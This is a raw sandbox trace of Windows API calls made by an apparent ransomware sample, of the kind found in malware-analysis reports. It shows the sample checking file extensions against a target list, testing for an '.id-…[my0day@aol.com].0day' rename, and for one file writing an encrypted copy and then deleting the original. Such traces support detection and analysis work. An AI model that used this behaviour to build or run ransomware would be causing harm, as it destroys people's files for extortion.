lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.642] lstrlenW (lpString=".rar") returned 4 [0041.642] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.642] lstrlenW (lpString=".bz2") returned 4 [0041.642] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.642] lstrlenW (lpString=".7z") returned 3 [0041.642] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.642] lstrlenW (lpString=".dbf") returned 4 [0041.642] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.642] lstrlenW (lpString=".1cd") returned 4 [0041.642] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.642] lstrlenW (lpString=".jpg") returned 4 [0041.642] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.643] lstrlenW (lpString=".doc") returned 4 [0041.643] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.643] lstrlenW (lpString=".docx") returned 5 [0041.643] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0041.643] lstrlenW (lpString=".pdf") returned 4 [0041.643] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.643] lstrlenW (lpString=".xls") returned 4 [0041.643] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.643] lstrlenW (lpString=".xlsx") returned 5 [0041.643] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0041.643] lstrlenW (lpString=".ppt") returned 4 [0041.643] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.643] lstrlenW (lpString=".zip") returned 4 [0041.643] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.643] lstrlenW (lpString=".rar") returned 4 [0041.643] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.643] lstrlenW (lpString=".bz2") returned 4 [0041.643] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.643] lstrlenW (lpString=".7z") returned 3 [0041.643] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.643] lstrlenW (lpString=".dbf") returned 4 [0041.643] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.643] lstrlenW (lpString=".1cd") returned 4 [0041.643] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.643] lstrlenW (lpString=".jpg") returned 4 [0041.643] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.644] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0041.644] lstrlenW (lpString="Genko_1.emf") returned 11 [0041.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.615] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=5524) returned 1 [0042.615] CloseHandle (hObject=0x174) returned 1 [0042.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20 [0042.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.615] lstrlenW (lpString=".doc") returned 4 [0042.615] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.616] lstrlenW (lpString=".docx") returned 5 [0042.616] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.616] lstrlenW (lpString=".pdf") returned 4 [0042.616] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.616] lstrlenW (lpString=".xls") returned 4 [0042.616] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.616] lstrlenW (lpString=".xlsx") returned 5 [0042.616] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.616] lstrlenW (lpString=".ppt") returned 4 [0042.616] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.616] lstrlenW (lpString=".zip") returned 4 [0042.616] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.616] lstrlenW (lpString=".rar") returned 4 [0042.616] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.616] lstrlenW (lpString=".bz2") returned 4 [0042.616] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.616] lstrlenW (lpString=".7z") returned 3 [0042.616] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.616] lstrlenW (lpString=".dbf") returned 4 [0042.616] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.616] lstrlenW (lpString=".1cd") returned 4 [0042.616] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.616] lstrlenW (lpString=".jpg") returned 4 [0042.616] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.616] lstrlenW (lpString=".doc") returned 4 [0042.616] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.616] lstrlenW (lpString=".docx") returned 5 [0042.617] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.617] lstrlenW (lpString=".pdf") returned 4 [0042.617] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.617] lstrlenW (lpString=".xls") returned 4 [0042.617] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.617] lstrlenW (lpString=".xlsx") returned 5 [0042.617] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.617] lstrlenW (lpString=".ppt") returned 4 [0042.617] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.617] lstrlenW (lpString=".zip") returned 4 [0042.617] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.617] lstrlenW (lpString=".rar") returned 4 [0042.617] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.617] lstrlenW (lpString=".bz2") returned 4 [0042.617] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.617] lstrlenW (lpString=".7z") returned 3 [0042.617] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.617] lstrlenW (lpString=".dbf") returned 4 [0042.617] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.617] lstrlenW (lpString=".1cd") returned 4 [0042.617] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.617] lstrlenW (lpString=".jpg") returned 4 [0042.617] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.618] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0042.618] lstrlenW (lpString="Orange Circles.htm") returned 18 [0042.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.618] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=237) returned 1 [0042.618] CloseHandle (hObject=0x174) returned 1 [0042.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0x20 [0042.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.618] lstrlenW (lpString=".doc") returned 4 [0042.619] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.619] lstrlenW (lpString=".docx") returned 5 [0042.619] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.619] lstrlenW (lpString=".pdf") returned 4 [0042.619] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.619] lstrlenW (lpString=".xls") returned 4 [0042.619] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.619] lstrlenW (lpString=".xlsx") returned 5 [0042.619] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.619] lstrlenW (lpString=".ppt") returned 4 [0042.619] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.619] lstrlenW (lpString=".zip") returned 4 [0042.619] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.619] lstrlenW (lpString=".rar") returned 4 [0042.619] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.619] lstrlenW (lpString=".bz2") returned 4 [0042.619] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.619] lstrlenW (lpString=".7z") returned 3 [0042.619] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.619] lstrlenW (lpString=".dbf") returned 4 [0042.619] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.619] lstrlenW (lpString=".1cd") returned 4 [0042.619] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.619] lstrlenW (lpString=".jpg") returned 4 [0042.619] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.619] lstrlenW (lpString=".doc") returned 4 [0042.619] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.620] lstrlenW (lpString=".docx") returned 5 [0042.620] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.620] lstrlenW (lpString=".pdf") returned 4 [0042.620] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.620] lstrlenW (lpString=".xls") returned 4 [0042.620] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.620] lstrlenW (lpString=".xlsx") returned 5 [0042.620] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.620] lstrlenW (lpString=".ppt") returned 4 [0042.620] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.620] lstrlenW (lpString=".zip") returned 4 [0042.620] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.620] lstrlenW (lpString=".rar") returned 4 [0042.620] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.620] lstrlenW (lpString=".bz2") returned 4 [0042.620] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.620] lstrlenW (lpString=".7z") returned 3 [0042.620] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.620] lstrlenW (lpString=".dbf") returned 4 [0042.620] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.620] lstrlenW (lpString=".1cd") returned 4 [0042.620] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.620] lstrlenW (lpString=".jpg") returned 4 [0042.620] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.620] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.620] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0042.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.621] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=6381) returned 1 [0042.621] CloseHandle (hObject=0x174) returned 1 [0042.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0x20 [0042.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.621] lstrlenW (lpString=".doc") returned 4 [0042.621] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.621] lstrlenW (lpString=".docx") returned 5 [0042.621] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.621] lstrlenW (lpString=".pdf") returned 4 [0042.621] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.621] lstrlenW (lpString=".xls") returned 4 [0042.621] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.621] lstrlenW (lpString=".xlsx") returned 5 [0042.621] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.621] lstrlenW (lpString=".ppt") returned 4 [0042.621] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.621] lstrlenW (lpString=".zip") returned 4 [0042.622] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.622] lstrlenW (lpString=".rar") returned 4 [0042.622] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.622] lstrlenW (lpString=".bz2") returned 4 [0042.622] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.622] lstrlenW (lpString=".7z") returned 3 [0042.622] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.622] lstrlenW (lpString=".dbf") returned 4 [0042.622] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.453] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=34916) returned 1 [0043.453] CloseHandle (hObject=0x20c) returned 1 [0043.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 0x20 [0043.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.454] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.454] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.454] GetLastError () returned 0x0 [0043.454] ReadFile (in: hFile=0x20c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x8864, lpOverlapped=0x0) returned 1 [0043.456] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x8870, lpOverlapped=0x0) returned 1 [0043.457] ReadFile (in: hFile=0x20c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.457] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.457] SetEndOfFile (hFile=0x1d8) returned 1 [0043.457] CloseHandle (hObject=0x1d8) returned 1 [0043.457] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.458] SetEndOfFile (hFile=0x20c) returned 1 [0043.458] CloseHandle (hObject=0x20c) returned 1 [0043.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0043.459] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1 [0043.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.459] lstrlenW (lpString=".doc") returned 4 [0043.459] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.459] lstrlenW (lpString=".docx") returned 5 [0043.459] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.459] lstrlenW (lpString=".pdf") returned 4 [0043.459] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.459] lstrlenW (lpString=".xls") returned 4 [0043.459] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.459] lstrlenW (lpString=".xlsx") returned 5 [0043.459] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.459] lstrlenW (lpString=".ppt") returned 4 [0043.459] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.459] lstrlenW (lpString=".zip") returned 4 [0043.459] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.459] lstrlenW (lpString=".rar") returned 4 [0043.459] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.459] lstrlenW (lpString=".bz2") returned 4 [0043.459] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.459] lstrlenW (lpString=".7z") returned 3 [0043.459] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.459] lstrlenW (lpString=".dbf") returned 4 [0043.459] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.460] lstrlenW (lpString=".1cd") returned 4 [0043.460] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.460] lstrlenW (lpString=".jpg") returned 4 [0043.460] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.460] lstrlenW (lpString=".doc") returned 4 [0043.460] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.460] lstrlenW (lpString=".docx") returned 5 [0043.461] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.461] lstrlenW (lpString=".pdf") returned 4 [0043.461] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.461] lstrlenW (lpString=".xls") returned 4 [0043.461] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.461] lstrlenW (lpString=".xlsx") returned 5 [0043.461] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.461] lstrlenW (lpString=".ppt") returned 4 [0043.461] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.461] lstrlenW (lpString=".zip") returned 4 [0043.461] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.461] lstrlenW (lpString=".rar") returned 4 [0043.461] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.461] lstrlenW (lpString=".bz2") returned 4 [0043.461] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.461] lstrlenW (lpString=".7z") returned 3 [0043.461] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.461] lstrlenW (lpString=".dbf") returned 4 [0043.461] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.461] lstrlenW (lpString=".1cd") returned 4 [0043.461] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.461] lstrlenW (lpString=".jpg") returned 4 [0043.461] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.461] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0043.461] 